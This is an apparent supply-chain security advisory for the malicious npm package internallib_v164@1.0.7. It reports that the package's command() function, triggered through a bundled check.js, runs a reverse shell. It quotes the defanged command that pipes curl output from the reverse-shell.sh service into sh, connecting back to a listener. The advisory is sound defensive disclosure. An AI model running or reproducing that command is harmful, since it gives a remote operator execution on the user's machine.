LWA-2026-10995 confirmed malware
internallib_v164@1.0.7
Malicious code in internallib_v164 (npm)
T1059.007 · JavaScriptT1071.001 · Web ProtocolsT1105 · Ingress Tool Transfer
Analysis
The package's exported command() function executes a reverse shell via child_process: it runs `curl hxxps://reverse-shell[.]sh/10[.]0[.]72[.]234:4444 | sh`, fetching a reverse-shell payload from the reverse-shell.sh service and piping it to a shell that connects back to listener 10[.]0[.]72[.]234:4444. A bundled check.js requires the module and invokes command(), so loading the package triggers the shell. The reverse shell gives the remote operator command execution on the installer's machine.
- analyzed by
- Leitwacht
- first seen
- Aug 11, 2026, 08:09 PM
- analyzed
- Aug 11, 2026, 08:09 PM
Related advisories
- minimalistic-assert-plus@1.1.7
- @tamago19/tamaaago@2.1.3
- neverthrow-core@1.1.2
- kit-vim-map@1.0.0
- @sqlite-labs-free/createsql@1.0.5
- freeai-proxy@1.0.0
- vexium-kit@2.0.2
- process-live-log@11.5.2
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.